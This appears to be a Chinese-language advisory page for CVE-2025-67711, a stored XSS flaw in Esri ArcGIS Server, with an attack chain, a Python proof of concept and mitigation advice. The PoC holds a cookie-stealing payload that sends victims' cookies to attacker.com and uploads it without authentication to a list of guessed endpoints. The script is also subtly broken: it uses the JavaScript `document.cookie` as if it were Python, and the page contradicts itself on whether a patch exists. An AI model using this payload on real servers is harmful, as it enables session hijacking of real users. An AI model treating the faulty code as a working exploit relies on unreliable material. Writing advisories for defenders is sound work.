CVE-2025-67711: Esri ArcGIS Server存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67711

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Esri ArcGIS Server 11.4及更早版本

漏洞概述

CVE-2025-67711是Esri ArcGIS Server中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响版本11.4及更早版本，涵盖Windows和Linux平台。在某些配置下，远程未认证攻击者可以利用此漏洞向服务器上传包含恶意代码的文件。当受害者浏览器访问这些被污染的内容时，恶意脚本会在受害者浏览器上下文中执行，可能导致敏感信息窃取、会话劫持、恶意操作执行等严重后果。由于攻击者无需认证即可实施攻击，且漏洞具有持久性(恶意代码存储在服务器端)，因此该漏洞具有较高的实际威胁性。建议管理员尽快应用官方发布的安全补丁，并审查服务器配置以防止此类攻击。

技术细节

存储型XSS漏洞发生在应用程序将用户输入未经充分过滤即存储并在后续页面中展示时。对于Esri ArcGIS Server 11.4及更早版本，攻击者可以通过文件上传功能或特定API接口上传包含恶意JavaScript代码的文件。服务器将这些文件存储后，当其他用户访问相关页面或触发特定功能时，浏览器会解析并执行这些恶意代码。攻击者通常使用<script>标签、事件处理器(如onerror、onload)或JavaScript伪协议来注入恶意代码。由于攻击代码持久存在于服务器端，每次有用户访问受污染内容时都会触发攻击，形成'一次注入，持久危害'的攻击模式。防御此类漏洞需要在服务端对所有用户输入进行严格的输入验证和输出编码。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描目标Esri ArcGIS Server版本，确认是否为11.4或更早版本，并识别可利用的上传接口

STEP 2

步骤2: 构造恶意文件

攻击者创建包含XSS payload的恶意文件，使用<script>标签或事件处理器注入JavaScript恶意代码

STEP 3

步骤3: 上传恶意文件

通过未认证的文件上传接口将恶意文件上传至服务器，服务器未对内容进行充分过滤即存储

STEP 4

步骤4: 等待受害者访问

当合法用户访问包含恶意文件内容的页面时，浏览器会解析并执行存储的恶意脚本

STEP 5

步骤5: 窃取敏感信息

恶意脚本在受害者浏览器上下文中执行，可窃取Cookie、会话令牌、敏感数据或执行恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-67711 PoC - Stored XSS in Esri ArcGIS Server
# Target: Esri ArcGIS Server 11.4 and earlier

TARGET = "https://target-arcgis-server.com"
XSS_PAYLOAD = '<script>document.location="https://attacker.com/log?c=' + 'cookie=' + document.cookie + '</script>'

def exploit_stored_xss():
    """
    Exploit stored XSS vulnerability in ArcGIS Server file upload functionality.
    Note: This PoC demonstrates the attack concept; actual exploitation requires
    identifying the specific vulnerable endpoint.
    """
    
    # Step 1: Identify vulnerable file upload endpoint
    upload_endpoints = [
        f"{TARGET}/arcgis/rest/services/upload",
        f"{TARGET}/server/admin/uploads",
        f"{TARGET}/arcgis/sharing/rest/content/features/generate"
    ]
    
    # Step 2: Prepare malicious file with XSS payload
    files = {
        'file': ('malicious.html', XSS_PAYLOAD, 'text/html')
    }
    
    # Step 3: Upload malicious file (unauthenticated)
    for endpoint in upload_endpoints:
        try:
            response = requests.post(endpoint, files=files, timeout=10)
            if response.status_code == 200:
                print(f"[+] File uploaded successfully to {endpoint}")
                print(f"[+] Payload: {XSS_PAYLOAD}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    return False

def verify_vulnerability():
    """
    Verify if the XSS payload was stored and is executable.
    """
    # Check if uploaded file is accessible
    check_urls = [
        f"{TARGET}/arcgis/sharing/rest/content/items/malicious.html",
        f"{TARGET}/server/data/malicious.html"
    ]
    
    for url in check_urls:
        try:
            response = requests.get(url, timeout=10)
            if XSS_PAYLOAD in response.text:
                print(f"[+] XSS vulnerability confirmed at {url}")
                return True
        except:
            pass
    
    return False

if __name__ == "__main__":
    print("CVE-2025-67711 PoC - Esri ArcGIS Server Stored XSS")
    print("=" * 50)
    exploit_stored_xss()
    verify_vulnerability()

影响范围

Esri ArcGIS Server 11.4

Esri ArcGIS Server 11.3

Esri ArcGIS Server 11.2

Esri ArcGIS Server 11.1

Esri ArcGIS Server 11.0

Esri ArcGIS Server 10.9.1及更早版本 (Windows/Linux)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)禁用不必要的文件上传功能；2)对上传文件类型和内容进行严格白名单验证；3)启用Web应用防火墙(WAF)规则检测XSS攻击特征；4)限制未认证用户的上传权限；5)实施严格的Content-Type验证；6)监控服务器日志关注异常文件上传行为。建议密切关注Esri官方安全公告，及时应用安全更新。